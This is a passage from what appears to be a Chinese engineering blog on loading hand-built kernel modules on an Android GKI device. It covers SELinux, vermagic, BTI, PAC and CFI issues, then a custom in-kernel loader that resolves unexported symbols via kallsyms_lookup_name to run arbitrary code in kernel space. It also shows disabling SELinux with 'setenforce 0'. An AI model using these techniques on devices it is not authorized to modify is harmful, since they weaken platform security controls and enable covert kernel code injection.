.o可以转.ko，.so不行。elf_validity_check() 第一行就检查 e_type != ET_REL，.so 是 ET_DYN，连门都进不去。用 gcc -c -fPIC 编译出的 .o 转 .ko 是最干净的路。

不要猜测目标内核的任何参数。vermagic 的拼装受十几个 CONFIG 宏控制，struct module 的布局受几十个 CONFIG 影响。从目标设备上已有的 .ko 提取，比自己猜准确得多。

让内核调用 init 的唯一途径是 .rela.gnu.linkonce.this_module 里的重定位。别被 .modinfo 里的 init= 误导——那是 modprobe 看的。内核在 apply_relocations() 中填充 mod->init，在 do_init_module() 中调用。重定位是唯一的数据通道。

空名字符号不一定是垃圾。STT_SECTION 符号名空但被重定位引用。删了它，段基址引用全错。

UND 符号的 shndx 必须是 0。内核在 simplify_symbols() 里用 case SHN_UNDEF 分发。改成 SHN_ABS 就不会去符号表搜索了。

ET_REL 里所有地址都是段相对的。库返回的绝对 VA 不能直接用，全部减掉段基址。内核在 simplify_symbols() 的 default 分支做 st_value + secbase，它假设 st_value 是段偏移，不是绝对值。

重定位类型编码有坑。LIEF 在标准类型值上加了架构前缀（x86_64 加 0x80000000，ARM64 加 0x100），写回前用 & 0x7FFFFFF 剥掉。

struct module 的名字字段偏移不要硬编码。用参考模块名在参考 struct 数据里搜索定位。

ARM64 多三个必需段。.plt、.init.plt、.text.ftrace_trampoline，缺一个 module_frob_arch_sections() 就报错。不是可选项。

修补工具必须尽可能是零依赖的。目标设备可能没有 libstdc++、没有 Python、没有 cmake。纯 C + elf.h，一个 C 编译器就能跑，才能真正做到"放到任何设备上都能用"。

4 安卓GKI安全机制适配

基础 ELF 转换只能让模块在格式上被内核接受。真正推到 ARM64 安卓GKI设备后，还要继续面对 SELinux、vermagic、BTI、PAC、SCS、CFI 以及厂商驱动对 section 布局的额外假设。

目标设备与初始现象

完成基础 ELF 转换后，我们得到了一份格式上合法的 .ko 文件，并在 x86 Kali 环境中成功实现加载。

信心满满地推送到目标设备：

SoC：MediaTek
系统：Android 12
内核：5.10.198
安全特性：全开

结果 insmod 直接甩回来一个让人摸不着头脑的错误。

SELinux与vermagic

坑 14：SELinux —— “File exists” 背后的权限墙

$ insmod /data/local/tmp/test.ko
insmod: can't insert 'test.ko': File exists

文件明明存在，且可读。ls -l 检查权限正常。dmesg 没有任何输出。strace insmod 到关键系统调用时直接返回：

-1 EEXIST

这个问题与 ELF 格式无关，完全是 Android 安全机制在起作用。

Android 对 /data/local/tmp/ 目录应用了严格的 SELinux 文件上下文限制。

insmod 在执行 finit_module() 系统调用之前，需要访问 .ko 文件，而 SELinux 在这种情况下会拒绝访问。

为了不暴露攻击面信息，Android 的 SELinux 错误码映射策略将本该返回的 EACCESS 转换成了 EEXIST —— 一个经典的反侦察设计。

即使你已经 su 到 root，SELinux 仍会介入。因为 root 用户的行为也受安全策略约束。

临时关闭 SELinux 是验证阶段最快的途径：

setenforce 0

之后 insmod 得以进入内核加载流程。

生产环境可考虑将模块放置于 SELinux 豁免路径，例如：

/vendor/lib/modules/

坑 15：Exec format error —— 跨平台的 vermagic 陷阱

在 Kali Linux x86_64 上验证通过的 .ko，推送到 ARM64安卓设备后：

$ insmod /data/local/tmp/test.ko
insmod: can't insert 'test.ko': Exec format error

dmesg 输出 vermagic 不匹配。

但我们明明已经从参考 .ko 中提取了 vermagic 并覆写，为什么还是不对？

内核的 vermagic 校验由 same_magic() 完成：

staticinlineintsame_magic(constchar *amagic, constchar *bmagic,
bool has_crcs){
if (has_crcs) {
        amagic += strcspn(amagic, " ");
        bmagic += strcspn(bmagic, " ");
    }
returnstrcmp(amagic, bmagic) == 0;
}

关键逻辑如下：

如果模块不包含 __versions 段，即 has_crcs == false
→ 完整字符串比对，版本号和后缀都参与。
如果模块包含 __versions 段，即 has_crcs == true
→ 跳过第一个空格前缀，也就是版本号，只比对后缀。

我们的 .ko 是带 __versions 段的，所以理论上版本号不同没关系。

但问题在于 Kali 和 Android 的后缀不同：

环境	vermagic 后缀示例
Kali x86_64	`SMP preempt mod_unload`
Android ARM64	`SMP preempt mod_unload aarch64`

Android 多了 aarch64 架构标识。

后缀不匹配，strcmp 直接失败，内核返回 -ENOEXEC，用户空间显示：

Exec format error

至于为什么修补没生效 —— 那是开发流程问题：fixup_ko 的编译产物是旧的，还没包含 vermagic 覆写逻辑。重新编译即可。

带 __versions 的模块，内核不关心版本号前缀，但后缀必须精确匹配。

后缀由十几个 CONFIG_ 宏拼装而成，包含：

架构标识
SMP
抢占模型
模块卸载支持
其他内核构建特征

跨设备、跨架构时，必须从目标设备的参考 .ko 中完整提取后缀，不能复用开发机的值。

越过 SELinux 和 vermagic 之后，模块终于进入了内核加载器的内部路径。

但迎接它的是更底层的 ARM64 安全机制 —— 这些特性由 CPU 和编译器联合强制执行。

BTI、PAC与SCS

坑 16：BTI —— 间接跳转的守门人

BTI 全称为 Branch Target Identification。

insmod 正常返回 0，但设备紧跟着直接重启。

从 pstore 中提取的崩溃日志显示，CPU 在 init_module 入口处触发了：

Target Branch Exception

ARMv8.5 引入了 BTI 硬件强制保护。

当一个间接跳转发生时，例如：

BR  xN
BLR xN

CPU 会检查目标地址的第一条指令是否为合法的 BTI 着陆指令。

常见 BTI 着陆指令包括：

指令	用途
`bti c`	用于间接函数调用
`bti j`	用于间接跳转

若目标地址没有合法 BTI 指令，CPU 会立即触发异常。

内核通过页表中的 GP，也就是 Guarded Page 位控制 BTI 的使能。

当开启：

CONFIG_ARM64_BTI_KERNEL=y

module_enable_text_rox() 在设置模块 .text 段为可执行时，会顺便通过 PTE_MAYBE_GP 设置 GP 位：

// arch/arm64/mm/pageattr.c
intset_memory_x(unsignedlong addr, int numpages)
{
return change_memory_common(addr, numpages,
                    __pgprot(PTE_MAYBE_GP),  // 设置 GP 位
                    __pgprot(PTE_PXN));
}

这意味着一旦 GP 位置位，该段任何间接跳转的目标都必须经过 BTI 校验。

内核调用模块初始化函数是通过函数指针完成的：

mod->init()

这是一个间接调用。

我们的测试代码使用普通 NDK Clang 编译，默认不生成 BTI 着陆指令。

在 GP 位打开的情况下，CPU 发现 init_module 的头指令不是：

bti c

于是产生 Target Branch Exception，最终导致 kernel panic。

必须告诉编译器生成 BTI 兼容代码：

clang -mbranch-protection=standard -c test.c -o test.o

-mbranch-protection=standard 会在每个可被间接调用的函数开头生成：

bti c

同时它还会启用 PAC，也就是下一个坑的主角。

坑 17：PAC —— 返回地址的签名校验

PAC 全称为 Pointer Authentication。

BTI 修复后，设备依然在加载模块时重启。

这次崩溃点发生在函数返回时，而非入口。

ARMv8.3 引入了 PAC，用于保护函数返回地址的完整性。

在函数入口，用栈指针 SP 作为 modifier 对返回地址 LR 进行签名：

paciasp

在函数出口，再用：

autiasp

验证签名。

若签名不通过，则触发 Authentication Fault，直接终止执行。

内核开启：

CONFIG_ARM64_PTR_AUTH_KERNEL=y

后，所有内核代码都使用 PAC。

模块代码如果不同步启用 PAC，就会出现这样的场景：

内核代码调用模块函数，返回时 LR 已被内核签名。
模块函数内 ret 时若没有 autiasp，CPU 直接放行返回地址，但内核调用者期望 PAC 状态一致。
更深层的问题：模块若通过内核 CFI 路径被间接调用，而模块未签名或未验证，会导致 PAC 上下文紊乱，最终在某次返回时触发 Authentication Fault。

关键约束是：模块与内核的 PAC 密钥必须一致。

这个一致性通过都使用同一编译选项生成相同的指令序列来保证。

与 BTI 完全相同：

clang -mbranch-protection=standard -c test.c -o test.o

-mbranch-protection=standard 同时生成 BTI 和 PAC 指令，一根编译选项解决两者。

坑 18：SCS —— 已悄悄绕过的幸运坑

SCS 全称为 Shadow Call Stack。

当开启：

CONFIG_SHADOW_CALL_STACK=y

内核会启用影子调用栈。

SCS 使用 x18 寄存器保存一个独立于正常栈的返回地址链。

在静态 SCS 实现下，也就是：

CONFIG_DYNAMIC_SCS 未设置

所有内核代码都必须遵守 SCS 规约，即不能随意使用 x18 寄存器。

任何对 x18 的写操作都会破坏影子调用栈，导致诡异的返回地址错误。

由于 KPM 编译时使用了与内核兼容的 Clang，并传递了：

-fsanitize=shadow-call-stack

该选项会隐式启用 SCS 指令生成，因此这个坑被自动绕过。

但还需注意：

若以后使用手写汇编，必须保留 x18 作为 SCS 指针的约定，否则会一脚踩进去。

CFI与厂商驱动兼容

坑 19：CFI —— 本次战斗的核心战役

CFI 全称为 Control Flow Integrity。

BTI 和 PAC 两关打通后，模块加载仍导致重启。

pstore 日志显示：

CFI failure at init_module+0x0/0xc [test]
(target: init_module+0x0/0xc [test]; expected type: 0x00000000)

我们终于触碰到了安卓GKI最核心的安全机制：CFI。背景：kCFI 还是 CFI_ICALL？内核 Makefile 中声明使用：

# Makefile
ifdef CONFIG_CFI_CLANG
CC_FLAGS_CFI := -fsanitize=kcfi

kCFI 的原理是每个可间接调用函数的入口前 4 字节保存一个类型哈希值。调用方在进行间接调用前，会检查：

*(target - 4)

是否与期望的哈希值匹配。

不匹配则执行 BRK 指令陷入内核，最终导致 panic。逻辑上，只要我们用同样的编译器、同样的标志编译模块，生成的哈希就能匹配。但事实并非如此。我们从目标设备提取了一个正常工作的参考模块 asix.ko，分析发现：

函数入口前 4 字节全是 0x00000000，没有 kCFI 哈希。
模块内存在一个巨大的 __cfi_check 函数，大小超过 1700 字节。
模块内存在 .cfi_jt 跳转表。

这印证了一个关键事实：

GKI 预编译模块实际使用的是 CFI_ICALL，也就是 UBSan 风格的 CFI，而非 kCFI。

Makefile 的声明与预编译模块的实际行为并不一致。

第一次尝试：无 CFI，直接崩溃

即使知道内核可能是 CFI_ICALL，我们仍先用标准编译试试水。

结果如前所述：

CFI failure at init_module

内核 panic。

第二次尝试：kCFI 哈希，哈希不匹配

改用：

-fsanitize=kcfi

编译后，错误变成：

CFI failure at init_module+0x0/0x2c [test_kcfi]
(target: init_module+0x0/0x2c [test_kcfi]; expected type: 0x36b1c5a6)

我们生成的哈希值是：

0x36b1c5a6

但内核期望的是 AOSP 预编译模块所用的哈希。

不同版本的 Clang，对同一函数原型生成的 CFI 哈希不同。

开发机上的 Clang 与 AOSP 构建内核时的 Clang 版本不一致，哈希体系不兼容，因此 kCFI 这条路也走不通。

第三次尝试：CFI_ICALL + LTO，加载成功！但……

根据 asix.ko 的格式特征，我们转向 CFI_ICALL。

CFI_ICALL 是 Clang 的：

-fsanitize=cfi

实现，依赖 LTO，也就是链接时优化，来生成跨编译单元的类型检查。

编译命令：

clang -flto=thin -fsanitize=cfi -fsanitize-cfi-cross-dso \
      -fvisibility=hidden -mbranch-protection=standard \
      -c test.c -o test.o

之后用 clang -r 将 LLVM bitcode 链接为 ELF relocatable 文件。

关键参数如下：

标志	作用
`-flto=thin`	启用 ThinLTO，CFI 的前提
`-fsanitize=cfi`	生成 CFI_ICALL 类型检查
`-fsanitize-cfi-cross-dso`	跨 DSO 间接调用验证
`-fvisibility=hidden`	隐藏非导出符号，配合 CFI 缩减检查范围
`-mbranch-protection=standard`	生成 BTI 与 PAC 兼容指令

这样生成的模块内部结构包括：

__cfi_check 函数
接收 (地址, 类型哈希)，验证该地址是否属于某个合法间接调用目标。
.cfi_jt 跳转表
为每个地址可被间接调用的函数生成一个 8 字节 CFI 桩，例如：
```
bti c
b   function_name.cfi
```

此时 init_module 符号指向这个桩，真正的代码在：

init_module.cfi

这一次，模块加载成功：

test_cfi: no symbol version for printk
calling  init_module+0x0/0x8 [test_cfi] @ 5515
HelloWorld: KPatcher ARM64 module loaded!
initcall init_module+0x0/0x8 [test_cfi] returned 0 after 6 usecs

注意：

init_module+0x0/0x8

其中 0x8 表示 init_module 的大小是 8 字节，而非实际代码大小。

这证实了它指向的是跳转表桩。

然而，胜利的喜悦只持续了几秒钟 —— 手机卡死了。

坑 20：mrdump 崩溃 —— 手机卡死的真正根因

insmod 命令在内核中阻塞，手机完全无响应：

屏幕触摸无效
物理按键无效
持续数分钟后才恢复

恢复后，dmesg 里出现了令人意外的崩溃：

[  980.921362] initcall init_module+0x0/0x8 [test_cfi] returned 0 after 4 usecs
[  980.921373] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008
[  980.948712] pc : load_ko_addr_list+0x148/0x294 [mrdump]
[  980.949203] mrdump_module_callback+0x24/0x44 [mrdump]
[  980.949206] blocking_notifier_call_chain+0x7c/0x100
[  980.949210] do_init_module+0x74/0x410

崩溃不在我们的代码里，而在一个叫 mrdump 的驱动中。

完整调用链如下。

梳理出来的调用链如下：

sys_finit_module()
  → load_module()
    → do_init_module()
      → do_one_initcall(mod->init)    // ← init_module 成功返回 0 ✓
      → mod->state = MODULE_STATE_LIVE
      → blocking_notifier_call_chain(
            &module_notify_list,
            MODULE_STATE_LIVE,
            mod)                       // 通知所有关心模块状态变化的回调
        → mrdump_module_callback()     // MediaTek mrdump 驱动的回调
          → load_ko_addr_list()        // ← 空指针解引用！崩溃！

问题出在 CFI_ICALL 编译所产生的 ELF section 布局上。

clang -r 将 LLVM bitcode 转换为 ELF 时，生成了一堆非标准的 section 名称：

Section 名	内容	大小
`.text`	空的	`0`
`.text.__cfi_check`	`__cfi_check` 函数	`0x101c`
`.text..L.cfi.jumptable`	`cleanup_module` CFI 桩	`8`
`.text..L.cfi.jumptable.1`	`init_module` CFI 桩	`8`
`.text.init_module.cfi`	实际 init 代码	`0x28`
`.text.cleanup_module.cfi`	实际 cleanup 代码	`0x10`
`……`	`……`	`……`

核心问题是：

.text 段大小为 0，所有实际代码分散在 .text.* 子段中。

MediaTek 的 mrdump 驱动注册了模块状态通知回调。

当模块变为：

MODULE_STATE_LIVE

时，blocking_notifier_call_chain() 会调用到：

mrdump_module_callback()

后者再调用：

load_ko_addr_list()

这个函数会遍历模块的 ELF section 表，遇到一个大小为 0 的 .text 段，以及大量非标准的 .text.* 子段。

其中一个查找操作返回 NULL 后未做空检查，直接解引用访问结构体成员，也就是偏移 0x8，导致空指针崩溃：

NULL pointer dereference at virtual address 0000000000000008

为什么内核本身不受影响？

内核的模块加载器在处理 section 时，主要基于 ELF Flags 分类，而不是根据名称。

例如：

// 部分简化逻辑
if (sh_flags & SHF_EXECINSTR) {
// 这个 section 是代码，放入 MOD_TEXT 区域
}

因此 .text.__cfi_check 虽然名字非标准，但因为其 Flags 包含：

SHF_EXECINSTR

内核仍能正确将其归入代码区域。在内存权限设置等环节，内核不依赖具体名称，所以兼容了这些非标准名字。但 mrdump 这样的第三方驱动就没有这么健壮，它很可能针对标准 section 名做了硬编码假设。

为什么手机是“卡死”而非“重启”？blocking_notifier_call_chain() 的实现是阻塞式的，且持有 module_mutex。当回调中发生 Oops 时：

mrdump
自己的 Oops 处理函数被调用，试图保存崩溃信息到存储。
保存操作耗时很长，可能持续数分钟。
在此期间，module_mutex 一直被持有。
任何其他需要该锁的代码路径全部阻塞，表现为系统完全无响应。

这不同于 kernel panic。

BUG() 会让 CPU 停摆，而这里更像是一次 Oops —— 内核最终还能继续运行，所以手机在数分钟后得以恢复。

必须将所有 .text.* 子段合并回标准的 .text 段。

使用 linker script 在 clang -r 阶段完成合并：

/* merge_text.lds */
SECTIONS
{
  .text           : { *(.text) *(.text.*) }
  .init.text      : { *(.init.text) }
  .exit.text      : { *(.exit.text) }
  .rodata         : { *(.rodata*) }
  .data           : { *(.data*) }
  .bss            : { *(.bss*) }
  .rela.text      : { *(.rela.text) *(.rela.text.*) }
  .gnu.linkonce.this_module : { *(.gnu.linkonce.this_module) }
  .init.plt       : { *(.init.plt) }
  /* ... 其余辅助段 ... */
}

重新链接：

clang -r -target aarch64-linux-gnu \
  -Wl,-T,merge_text.lds \
  test.o -o test_merged.o

得到的模块 section 布局恢复标准：

Section	内容
`.text`	所有代码，包括 `__cfi_check`、CFI 桩、init、cleanup
`.rodata`	只读数据
`.gnu.linkonce.this_module`	`struct module`
`.modinfo`	模块元信息
`……`	`……`

再次加载：

$ insmod /data/local/tmp/test_cfi_fixed.ko
INSMOD_SUCCESS

秒级返回，无卡死。

查看日志：

$ dmesg | grep test_cfi

输出：

test_cfi: no symbol version for printk
calling  init_module+0x0/0x8 [test_cfi] @ 5515
HelloWorld: KPatcher ARM64 module loaded!
initcall init_module+0x0/0x8 [test_cfi] returned 0 after 6 usecs

无 mrdump 崩溃，无 Oops，一切正常。

GKI适配经验总结

通过上面的排查，格式正确的.ko已经可以在 ARM64 安卓GKI设备上正常加载和卸载。

总结一下这 7 个坑带来的核心教训：

SELinux 会拦截 insmod，并返回极具误导性的 File exists。必须关闭 SELinux 或使用豁免路径。

Vermagic 必须精确匹配。修补时还要注意工具本身是否更新到位。

BTI 强制要求间接跳转目标为 BTI 着陆指令。启用 -mbranch-protection=standard 即可。

PAC 强制要求返回地址签名验证。它与 BTI 共享同一编译标志。

CFI 是核心挑战。Makefile 声明 kCFI，但 GKI 预编译模块实际使用 CFI_ICALL。应以参考模块的二进制特征为准。

CFI_ICALL 会产生非标准 ELF section 名。典型表现是空的 .text，代码散落在 .text.* 中，这会导致厂商驱动在遍历 section 时空指针崩溃。

用Linker Script合并section名，才能同时兼容内核和第三方驱动的预期。

至此，模块终于能在 ARM64 安卓GKI设备上安全、正常地加载和卸载。

5 KPM加载器运行时实现

当基础格式和安全机制都打通后，还会面临一个更根本的问题：是否必须依赖内核原生的模块加载器？

如果希望在目标设备运行时动态接收、解析、重定位并执行受控二进制，就必须自己实现一个运行在内核空间的迷你加载器。下面记录自研 KPM Loader 从设计到落地过程中遇到的关键问题。原始调试过程中一共记录了第 21 到第 39 个坑，经过复盘后，将其中被后续方案完全覆盖的临时坑合并，最终整理为第 21 到第 35 个核心坑。

设计目标与运行时基础

KPatcher 的离线转换方案解决了“生成合法 .ko”的问题，但它有一个根本局限：

所有 ELF 转换、section 修补、符号处理和重定位修复都必须在开发机上完成。

如果希望目标设备在运行时直接接收二进制、完成解析、重定位和执行，就需要一个运行在内核空间的加载器。

KPM Loader 应运而生。

它是一个独立内核模块，通过 /proc 接口接收一种自定义格式的二进制，称为 KPM，并在内核空间完成：

ELF 解析
section 布局
符号解析
重定位处理
内存权限切换
指令缓存刷新
KPM 入口函数调用
KPM 卸载与资源释放

本质上，这就是一个迷你的内核模块加载器。

内核原生加载器走过的每一步：

ELF 校验
section 分类
符号解析
relocation 应用
module memory 分配
text 权限切换
init / exit 生命周期管理

我们都要自己实现一遍。

而那些在内核加载器里被成熟代码处理好的细节，自己动手时全都变成了坑。

坑 21：kallsyms_lookup_name 地址的 KASLR 时效性

每次都按流程获取 kallsyms_lookup_name 地址：

insmod loader.ko kaddr=0x...

模块可以加载成功。但有时前一秒还能正常工作的模块，下一秒就崩溃。崩溃类型是：

IABT

也就是 Instruction Abort。

崩溃点恰好发生在调用 kallsyms_lookup_name() 的位置。

安卓GKI内核启用了KASLR：

Kernel Address Space Layout Randomization

每次设备重启后，内核符号的虚拟地址都会重新随机化。典型错误流程如下：

# 终端 1：获取地址
adb shell grep kallsyms_lookup_name /proc/kallsyms
# 输出：
# ffffffeedaaa69b8 T kallsyms_lookup_name
# 设备中途崩溃重启，KASLR 重新随机化
# 终端 2：继续使用旧地址
adb shell insmod loader.ko kaddr=0xffffffeedaaa69b8
# 旧地址已经失效，跳转到随机位置，触发 IABT

两个 adb 会话之间设备恰好发生了重启，符号地址已经变化，但 loader 仍在使用旧地址。

始终在同一次启动周期内重新获取地址，并立即加载模块。

示例：

ADDR=$(adb shell "su -c 'grep kallsyms_lookup_name /proc/kallsyms | head -1'" \
    | awk '{print "0x"$1}')
adb shell "su -c 'insmod /data/local/tmp/loader.ko kaddr=$ADDR'"

KASLR 地址只在单次启动周期内有效。

任何崩溃、重启、软重启之后，都必须重新获取所有 kallsyms 地址。

这是动态分析内核环境的基础纪律。

坑 22：hex_to_ulong 的 0x 前缀陷阱

通过 /proc/kpm_loader 写入了正确的 kallsyms_lookup_name 地址：

echo kaddr 0xffffffeedaaa69b8 > /proc/kpm_loader

但 dmesg 显示：

kallsyms_lookup_name set to 0

后续所有符号解析全部失败。

自写的 hex_to_ulong() 函数没有处理 0x 前缀。

有 bug 的解析逻辑类似这样：

staticinthex_to_ulong(constchar *s, int max_len, unsignedlong *out)
{
unsignedlong v = 0;
int i;
for (i = 0; i < max_len && s[i]; i++) {/*
         * 遇到非十六进制字符就停止。
         *
         * 输入是 0xffffffeedaaa69b8：
         *   s[0] = '0'
         *   s[1] = 'x'
         *
         * 'x' 不是十六进制字符，于是循环在 i = 1 处退出。
         */    }/*
     * 函数错误地认为 i > 0 就是解析成功，
     * 最终 out 被设置成 0。
     */}

也就是说：

0xffffffeedaaa69b8

被错误解析成：

而且函数还返回“成功”。

在解析前显式跳过 0x 或 0X 前缀：

if (s[0] == '0' && (s[1] == 'x' || s[1] == 'X'))
    s += 2;

十六进制解析函数必须显式处理 0x 前缀。内核日志、/proc/kallsyms 输出、用户空间脚本提取出来的地址，几乎都会保留这个前缀。如果解析器不处理它，就会解析出 0，而且很可能没有任何错误提示。

内存权限与符号可见性

坑 23：ARM64 上 module_alloc() 返回的是不可执行内存

KPM 加载完成后调用入口函数：

kpm_init()

结果触发：

IABT

也就是 Instruction Abort。崩溃地址正好落在 KPM 的 .text 段中。这说明代码所在内存不可执行。在 ARM64 GKI 上，module_alloc() 返回的内存属性通常是：

PAGE_KERNEL

也就是：

可读
可写
不可执行

在 ARM64 上，不可执行由 PXN 控制：

PXN = Privileged Execute Never

因此，module_alloc() 得到的内存默认不是可执行内存。这和很多 x86_64 环境不同。x86 上开发 loader 时，这类问题经常不会暴露；但在 ARM64安卓GKI上，PXN 是硬件强制的。不能一分配完就直接执行。正确流程应该是：

阶段 1：分配内存
  module_alloc()
  得到 RW / NX 内存
阶段 2：写入内容
  复制 section
  解析符号
  生成 PLT / GOT
  应用 relocation
阶段 3：切换权限
  set_memory_x()
  设置 text 可执行
阶段 4：刷新指令缓存
  flush_icache
阶段 5：调用入口函数
  kpm_init()

示例流程：

void *base = module_alloc(total_size);
/* 阶段 1：清零 */
memset(base, 0, total_size);
/* 阶段 2：所有写入都在 RW 阶段完成 */
kpm_move_sections(mod, info, base);
kpm_simplify_symbols(mod, info);
kpm_build_got(mod, info);
kpm_apply_relocations(mod, info);
/* 阶段 3：之后才切换为可执行 */
kpm_make_exec(base, total_size);
/* 阶段 4：刷新 icache */
kpm_flush_icache(base, total_size);
/* 阶段 5：调用 KPM */
call_kpm_init(mod->init, args, event, reserved);

ARM64 的 PXN 是硬件级约束。不能假设 module_alloc() 返回的内存默认可执行。所有代码写入完成后，必须显式切换为可执行。

坑 24：WXN 硬件上的写入时序问题

重定位计算完全正确，但写入指令后读回仍是旧值。表现像是写操作失败，但没有明确报错。

部分 ARM64 硬件实现支持 WXN：

Write XOR Execute

也就是页面不能同时拥有写权限和执行权限。错误流程如下：

kpm_alloc_exec(size)
  → 分配内存
  → 立即 set_memory_x()
kpm_move_sections()
  → 复制 .text 内容
kpm_apply_relocations()
  → patch 指令

问题在于：

在 relocation patching 之前，页面已经被设置成可执行。

此时如果硬件或内核策略不允许可执行页继续写入，那么后续对 .text 的写操作可能失败或行为异常。

必须严格遵循：

RW 阶段：
  复制 section
  应用 relocation
  写 PLT / GOT / thunk
  完成所有 patching
RX 阶段：
  切换为可执行
  刷新 icache
  不再写 .text

也就是：

/* RW 阶段 */
base = module_alloc(size);
memset(base, 0, size);
kpm_move_sections(...);
kpm_apply_relocations(...);
kpm_generate_trampolines(...);
/* RX 阶段 */
set_memory_x(...);
flush_icache_range(...);
/* 执行阶段 */
call_kpm_init(...);

ARM64 上写权限和执行权限必须分阶段管理。只要 .text 进入可执行阶段，就不应该再继续 patch 它。

坑 25：GKI 符号可见性限制

编译阶段一切正常，但运行时：

kallsyms_lookup("module_alloc")

NULL

类似的问题还出现在：

set_memory_x
set_memory_rw
__flush_icache_range
aarch64_insn_patch_text_nosync

安卓GKI严格限制导出符号列表。某个符号即使存在于 /proc/kallsyms 中，也不代表普通模块可以直接引用。

常见情况是：

符号	是否通常可直接模块引用
`printk`	可以
`kmalloc` / `kfree`	可以
`vmalloc` / `vfree`	可以
`filp_open` / `filp_close`	视配置而定
`module_alloc`	通常不可直接引用
`set_memory_x`	通常不可直接引用
`set_memory_rw`	通常不可直接引用
`__flush_icache_range`	通常不可直接引用
`aarch64_insn_patch_text_nosync`	通常不可直接引用

KPM Loader 又恰好需要这些不导出的核心函数。

在 loader 初始化阶段，通过传入的 kallsyms_lookup_name 地址统一解析，并缓存所需符号。

示例结构：

staticunsignedlong cached_module_alloc;
staticunsignedlong cached_set_memory_x;
staticunsignedlong cached_set_memory_rw;
staticunsignedlong cached_flush_icache;
staticunsignedlong cached_insn_patch;
staticconstchar *needed_syms[] = {
"module_alloc",
"set_memory_x",
"set_memory_rw",
"__flush_icache_range",
"aarch64_insn_patch_text_nosync",
NULL
};

初始化时统一解析：

for (int i = 0; needed_syms[i]; i++) {
unsignedlong addr = kallsyms_lookup(needed_syms[i]);
if (!addr) {
        pr_warn("kpm_loader: symbol %s not found\n", needed_syms[i]);
continue;
    }/*
     * 根据符号名缓存到对应变量。
     */}

不要假设某个内核符号在 GKI 上一定导出。

写内核 loader 需要的关键函数，往往恰好不在 GKI 对外导出列表中。

重定位引擎

坑 26：AArch64 重定位类型常量整体偏移一位

KPM 中的：

printk("kpm_test: init called\n");

输出了乱码，而不是正常字符串。

进一步调试发现，ADRP 指令编码异常：

正确值：0xB0000000
实际值：0x9001FF00

对比：

正确：
  0xB0000000 = adrp x0, #0x1000
  指向 rodata 页面
实际：
  0x9001FF00 = adrp x0, #0x7FC000
  指向约 8MB 外的随机页面

但重定位数学本身是对的：

val   = mod->start + 0x1000
place = mod->start + 0x8
sval  = 0x1000
imm   = 1

理论上 ADRP 应该被编码成：

0xB0000000

但实际却变成了：

0x9001FF00

loader 中定义的 AArch64 relocation type 常量，从 MOVW_PREL_G0 开始整体偏移了一位。

错误表大致如下：

常量	错误值	正确值
`R_AARCH64_MOVW_PREL_G0`	`0x112`	`0x111`
`R_AARCH64_MOVW_PREL_G0_NC`	`0x113`	`0x112`
`R_AARCH64_ADR_PREL_PG_HI21`	`0x114`	`0x113`
`R_AARCH64_ADR_PREL_PG_HI21_NC`	`0x115`	`0x114`
`R_AARCH64_ADD_ABS_LO12_NC`	`0x116`	`0x115`
`R_AARCH64_LDST8_ABS_LO12_NC`	`0x117`	`0x116`
`R_AARCH64_TSTBR14`	`0x118`	`0x117`
`R_AARCH64_CONDBR19`	`0x119`	`0x118`

这导致真实的 ADRP relocation 被错误匹配到了 MOVW relocation 分支。

最终出现这样的污染路径：

真实 relocation：
  type = 275
  含义 = R_AARCH64_ADR_PREL_PG_HI21
错误匹配：
  type 275 被当成 MOVW_PREL_G0_NC
结果：
  用 MOVW 编码逻辑 patch ADRP 指令

于是：

原始 ADRP 指令 = 0x90000000
错误 imm       = 0xFF8
错误编码结果   = 0x9001FF00

严格按照 ARM ELF 规范修正 relocation 常量：

#define R_AARCH64_MOVW_PREL_G0          0x111
#define R_AARCH64_MOVW_PREL_G0_NC       0x112
#define R_AARCH64_ADR_PREL_PG_HI21      0x113
#define R_AARCH64_ADR_PREL_PG_HI21_NC   0x114
#define R_AARCH64_ADD_ABS_LO12_NC       0x115
#define R_AARCH64_LDST8_ABS_LO12_NC     0x116
#define R_AARCH64_TSTBR14               0x117
#define R_AARCH64_CONDBR19              0x118

修复后：

ADRP: new_insn=b0000000
kpm_test: init called

ELF relocation type 常量不能凭记忆手写。必须和权威来源交叉验证，例如：

ARM ELF ABI
binutils include/elf/aarch64.h
LLVM AArch64 relocation 定义

一个常量错位，会导致后续多个 relocation 类型互相顶替，症状非常隐蔽。

坑 27：ET_REL 非 SHF_ALLOC 段的 sh_addr 必须手动设置

重定位引擎处理 .rela.text 等 relocation section 时，需要访问：

sechdrs[].sh_addr

但对于：

.symtab
.strtab
.rela.text
.rela.data

这些非 SHF_ALLOC 段，sh_addr 仍然是 0。结果访问空地址，触发内核 Oops。对于 ET_REL 文件，section header 中的 sh_addr 通常是 0。

因为它还没有被最终链接，也没有运行时地址。内核原生 module loader 会在加载过程中设置 section 的运行时地址。但自己写 loader 时，这一步需要手动完成。尤其要注意：重定位处理不仅需要访问 SHF_ALLOC 段，也需要访问非 SHF_ALLOC 的符号表、字符串表和 relocation 表。

例如：

Elf_Sym  *symtab = (Elf_Sym *)sechdrs[symindex].sh_addr;
char     *strtab = (char *)sechdrs[strindex].sh_addr;
Elf_Rela *rela   = (Elf_Rela *)sechdrs[relsec].sh_addr;

如果这些 sh_addr 没有设置，就会访问 NULL。在 loader setup 阶段，对所有非 SHF_ALLOC 段设置 sh_addr，让它们指向文件缓冲区中的原始位置：

for (unsignedint i = 0; i < shnum; i++) {
if (!(info->sechdrs[i].sh_flags & SHF_ALLOC)) {
        info->sechdrs[i].sh_addr =
            (unsignedlong)info->hdr + info->sechdrs[i].sh_offset;
    }
}

ET_REL 文件中的 sh_addr 不能直接相信。自己写 loader 时，非 ALLOC 段也必须拥有一个可访问的内存地址。否则符号表、字符串表、relocation 表都会在运行时访问失败。

坑 28：字符串指针转换的 section 偏移陷阱

KPM 加载成功，但 dmesg 显示：

loading module '' version ''

模块名和版本号都是空字符串。但检查 KPM 文件中的 .kpm.info 段，字符串明明存在。在 ELF 文件解析阶段，KPM 的元数据指针：

name
version
license

都指向文件缓冲区中的 .kpm.info 段。当 KPM 被搬迁到运行时内存后，需要把这些指针从“文件地址”转换成“运行时地址”。

错误写法是：

mod->info.name = info->name - (constchar *)info->hdr + mod->info.base;

这个公式的问题是它以整个 ELF 文件头作为基准，而不是以 .kpm.info 段起始地址作为基准。实际数据流类似：

info->name      = hdr + section_offset + string_offset
info->hdr       = hdr
mod->info.base  = runtime 中 .kpm.info 段地址

错误公式会把 section_offset 也加进运行时地址里，导致最终指针偏移过头。必须以 .kpm.info 段在文件中的起始地址为基准：

